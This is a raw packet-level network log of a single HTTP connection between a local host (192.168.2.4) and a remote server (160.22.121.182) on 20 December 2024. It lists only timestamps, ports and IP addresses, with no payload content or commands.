Dec 20, 2024 10:22:05.296019077 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.296119928 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.296175957 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.298006058 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.298108101 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.298161030 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.300030947 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.300132990 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.300192118 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.302083969 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.302180052 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.302227974 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.304137945 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.304241896 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.304308891 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.306160927 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.306361914 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.306420088 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.308207035 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.308368921 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.308424950 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.310245991 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.310381889 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.310435057 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.312294006 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.312426090 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.312479973 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.314407110 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.314543962 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.314603090 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.316356897 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.316488981 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.316550016 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.318414927 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.318515062 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.318573952 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.320472002 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.320568085 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.320662975 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.322559118 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.322638988 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.322700024 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.408720970 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.408791065 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.408890009 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.409487009 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.409606934 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.409651041 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.411262989 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.411354065 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.411454916 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.464114904 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.464207888 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.464266062 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.464891911 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.464941978 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.465183973 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.466300964 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.466424942 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.466702938 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.467658043 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.467753887 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.467806101 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.469160080 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.469249964 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.469425917 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.470523119 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.470638990 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.470690012 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.472040892 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.472172976 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.472913980 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.473474979 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.473587036 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.474904060 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.474971056 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.474978924 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.475023031 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.476367950 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.476468086 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.476649046 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.477750063 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.477854967 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.477927923 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.479224920 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.479340076 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.479475021 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.480626106 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.480751991 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.480802059 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.482105017 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.482202053 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.482248068 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.483522892 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.483633995 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.483678102 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.484970093 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.485095024 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.485140085 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.486423016 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.486510038 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.486556053 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.487921000 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.488053083 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.488132000 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.489316940 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.489414930 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.489459991 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.490736961 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.490956068 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.491017103 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.492183924 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.492307901 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.492352962 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.493658066 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.493788958 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.493834019 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.495111942 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.495286942 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.495356083 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.496532917 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.496615887 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.496664047 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.498001099 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.498121977 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.498174906 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.499485970 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.499591112 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.499638081 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.500884056 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.501096010 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.501152039 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.502356052 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.502425909 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.502482891 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.503755093 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.503878117 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.503969908 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.505295992 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.505403042 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.505455017 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.506722927 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.506812096 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.506859064 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.508069992 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.508188963 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.508250952 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.509546995 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.509628057 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.509677887 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.510970116 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.511094093 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.511140108 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.512470961 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.512618065 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.512660027 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.513895035 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.513977051 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.514131069 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.515316963 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.515439034 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.515485048 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.516751051 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.516846895 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.516890049 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.518201113 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.518362045 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.518413067 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.519634962 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.519764900 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.519813061 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.521114111 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.521250010 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.521296978 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.522578955 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.522638083 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.522686005 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.523978949 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.524100065 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.524142027 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.525441885 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.525551081 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.525589943 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.526864052 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.526992083 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.527034044 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.528305054 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.528430939 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.528502941 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.529735088 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.529854059 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.529911041 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.531183004 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.531296968 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.531337023 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.532656908 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.532752991 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.532795906 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.534086943 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.534213066 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.534255981 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.535510063 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.535564899 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.535609007 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.595545053 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.595642090 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.595716000 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.596163988 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.596465111 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.596525908 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.596570969 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.597951889 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.598002911 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.598035097 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.599416018 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.599464893 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.656398058 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.656527042 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.656588078 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.656864882 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.656974077 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.657088041 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.657685041 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.657810926 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.657866955 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.658535004 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.658708096 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.659394979 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.659445047 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.659540892 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.659591913 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.660223961 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.660346031 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.660397053 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.661096096 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.661205053 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.661257982 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.661947966 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.662065983 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.662115097 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.662818909 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.662990093 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.663623095 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.663640022 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.663717031 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.663765907 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.664484978 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.664659023 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.665348053 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.665396929 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.665469885 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.665517092 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.666207075 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.666304111 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.667156935 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.667206049 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.667263985 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.667308092 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.667970896 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.668036938 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.668085098 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.668795109 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.668858051 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.668922901 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.669735909 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.669956923 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.670022011 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.670557976 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.670645952 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.671379089 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.671432972 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.671468973 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.671515942 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.672233105 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.672369957 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.672421932 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.673075914 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.673183918 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.673228025 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.673876047 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.673978090 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.674037933 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.674767017 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.675009966 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.675055027 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.675636053 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.675714970 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.676336050 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.676457882 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.676572084 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.677361012 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.677405119 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.677409887 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.677448988 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.717518091 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.717606068 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.717684031 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.717852116 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.717968941 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.718610048 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.718710899 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.718751907 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.718786001 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.719428062 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.719537020 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.720299006 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.720356941 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.720449924 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.720508099 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.721112013 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.721225977 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.721282959 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.721962929 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.722353935 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.722832918 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.722887993 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.722928047 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.723001003 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.723659992 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.723788977 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.724570036 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.724581003 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.724756002 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.725399971 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.725459099 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.725512981 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.725578070 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.726267099 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.726385117 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.727091074 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.727148056 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.727217913 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.727279902 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.728010893 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.728101969 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.728622913 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.728996038 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.729096889 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.729845047 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.729861021 CET	80	49730	160.22.121.182	192.168.2.4
